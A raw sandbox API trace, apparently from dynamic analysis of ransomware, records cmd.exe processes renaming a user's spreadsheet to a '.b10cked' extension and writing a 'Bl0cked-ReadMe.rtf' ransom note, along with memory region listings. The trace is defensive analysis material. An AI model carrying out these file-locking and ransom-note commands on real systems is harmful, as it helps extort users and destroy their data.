returned 0x18 [0140.193] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: 
"c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.193] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.193] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.193] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.194] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f6ec | out: lpFindFileData=0x20f6ec) returned 0x3c0030 [0140.194] FindClose (in: hFindFile=0x3c0030 | out: hFindFile=0x3c0030) returned 1 [0140.194] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.194] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.194] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.194] GetEnvironmentStringsW () returned 0x3c2b10* [0140.194] FreeEnvironmentStringsW (penv=0x3c2b10) returned 1 [0140.194] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.195] GetConsoleOutputCP () returned 0x1b5 [0140.195] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.195] GetUserDefaultLCID () returned 0x409 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fab0, cchData=128 | out: lpLCData="0") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fab0, cchData=128 | out: lpLCData="0") returned 2 [0140.195] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fab0, cchData=128 | out: lpLCData="1") 
returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.196] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.196] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.197] GetConsoleTitleW (in: lpConsoleTitle=0x3b08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.197] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.197] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.198] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.198] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.198] _wcsicmp 
(_String1="FOR/?", _String2="move") returned -7 [0140.198] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.198] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.198] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.198] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.202] GetConsoleTitleW (in: lpConsoleTitle=0x20f7a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.855] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.855] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.855] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.855] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.855] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.855] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.855] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.855] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.855] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.855] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.855] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.856] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.856] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.856] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.856] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.856] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.856] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.856] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.856] 
_wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.856] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.856] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.856] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.856] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.856] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.856] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.856] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.856] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.858] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.858] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f564, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f55c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f55c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.858] _wcsnicmp 
(_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.858] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", 
_String2="USERNAM", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.859] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.860] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.860] _wcsicmp (_String1="VBKNJI~1.ODS", _String2=".") returned 72 [0140.860] _wcsicmp (_String1="VBKNJI~1.ODS", _String2="..") returned 72 [0140.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknji~1.ods")) returned 0x20 [0140.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1e70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.860] SetErrorMode (uMode=0x0) returned 0x0 [0140.860] SetErrorMode (uMode=0x1) returned 0x0 [0140.860] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", nBufferLength=0x104, lpBuffer=0x20eeec, lpFilePart=0x20eed4 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", lpFilePart=0x20eed4*="VBKNJI~1.ODS") returned 0x2f [0140.860] SetErrorMode (uMode=0x0) returned 0x1 [0140.860] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x12 [0140.861] _wcsicmp (_String1="VBKNJI~1.ODS", _String2=".") returned 72 [0140.861] _wcsicmp (_String1="VBKNJI~1.ODS", _String2="..") returned 72 [0140.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknji~1.ods")) returned 0x20 [0140.861] SetErrorMode (uMode=0x0) returned 0x0 [0140.861] SetErrorMode (uMode=0x1) returned 0x0 [0140.861] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", nBufferLength=0x104, lpBuffer=0x20f368, lpFilePart=0x20f100 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", lpFilePart=0x20f100*="VBKNJI~1.ODS") returned 0x2f [0140.861] SetErrorMode (uMode=0x0) returned 0x1 [0140.861] SetErrorMode (uMode=0x0) returned 0x0 [0140.861] SetErrorMode (uMode=0x1) returned 0x0 [0140.861] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", nBufferLength=0x104, lpBuffer=0x20f570, lpFilePart=0x20f100 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", lpFilePart=0x20f100*="VBKNjIyz39y.ods.b10cked") returned 0x3a [0140.861] SetErrorMode (uMode=0x0) returned 0x1 [0140.861] SetLastError (dwErrCode=0x0) [0140.861] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods.b10cked")) returned 0xffffffff [0140.861] GetLastError () returned 0x2 [0140.861] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x20ea7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ea7c) returned 0x3b0eb8 [0140.862] FindNextFileW (in: hFindFile=0x3b0eb8, lpFindFileData=0x20ea7c | out: lpFindFileData=0x20ea7c) returned 0 [0140.864] GetLastError () returned 0x12 [0140.864] FindClose (in: hFindFile=0x3b0eb8 | out: hFindFile=0x3b0eb8) returned 1 [0140.865] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNJI~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x3c1c10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1c10) returned 0x3b0eb8 [0140.865] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", nBufferLength=0x104, lpBuffer=0x20ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked", lpFilePart=0x0) returned 0x3a [0140.865] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods", nBufferLength=0x104, lpBuffer=0x20ed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods", lpFilePart=0x0) returned 0x32 [0140.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods")) returned 0x20 [0140.865] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\VBKNjIyz39y.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\vbknjiyz39y.ods.b10cked"), dwFlags=0x3) returned 1 [0140.865] FindClose (in: hFindFile=0x3b0eb8 | out: hFindFile=0x3b0eb8) returned 1 [0140.865] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ecc8 | out: _Buffer=" 1") returned 9 [0140.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.865] GetFileType (hFile=0x7) returned 0x2 [0140.866] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ec54 | out: lpMode=0x20ec54) returned 1 [0140.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ec88 | out: lpConsoleScreenBufferInfo=0x20ec88) returned 1 [0140.866] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.866] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ecc8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.866] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x20ecac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ecac*=0x1a) returned 1 [0140.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.867] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.867] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.867] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.867] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.867] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.867] SetConsoleInputExeNameW () returned 0x1 [0140.867] GetConsoleOutputCP () returned 0x1b5 [0140.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.867] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.867] exit (_Code=0) Process: id = "163" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a40" os_pid = "0xd90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000000030000" filename = "" Region: id = 14784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14785 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14786 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14787 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14788 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14789 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14790 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14791 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15216 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 15217 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 15218 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 15219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15220 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15226 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15228 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 15229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15231 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 15232 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 15233 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15234 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15235 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 15236 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 15237 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" 
Thread: id = 220 os_tid = 0xda8 [0139.426] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fddc | out: lpSystemTimeAsFileTime=0x16fddc*(dwLowDateTime=0x8d0896a0, dwHighDateTime=0x1d440a9)) [0139.426] GetCurrentProcessId () returned 0xd90 [0139.426] GetCurrentThreadId () returned 0xda8 [0139.426] GetTickCount () returned 0x2bd84 [0139.426] QueryPerformanceCounter (in: lpPerformanceCount=0x16fdd4 | out: lpPerformanceCount=0x16fdd4*=19621505876) returned 1 [0139.426] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0139.433] __set_app_type (_Type=0x1) [0139.433] __p__fmode () returned 0x76b331f4 [0139.433] __p__commode () returned 0x76b331fc [0139.433] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0139.433] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0139.433] GetCurrentThreadId () returned 0xda8 [0139.433] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xda8) returned 0x38 [0139.433] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.433] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0139.433] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.437] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.437] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fd6c | out: phkResult=0x16fd6c*=0x0) returned 0x2 [0139.437] VirtualQuery (in: lpAddress=0x16fda3, lpBuffer=0x16fd3c, dwLength=0x1c | out: lpBuffer=0x16fd3c*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.437] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fd3c, dwLength=0x1c 
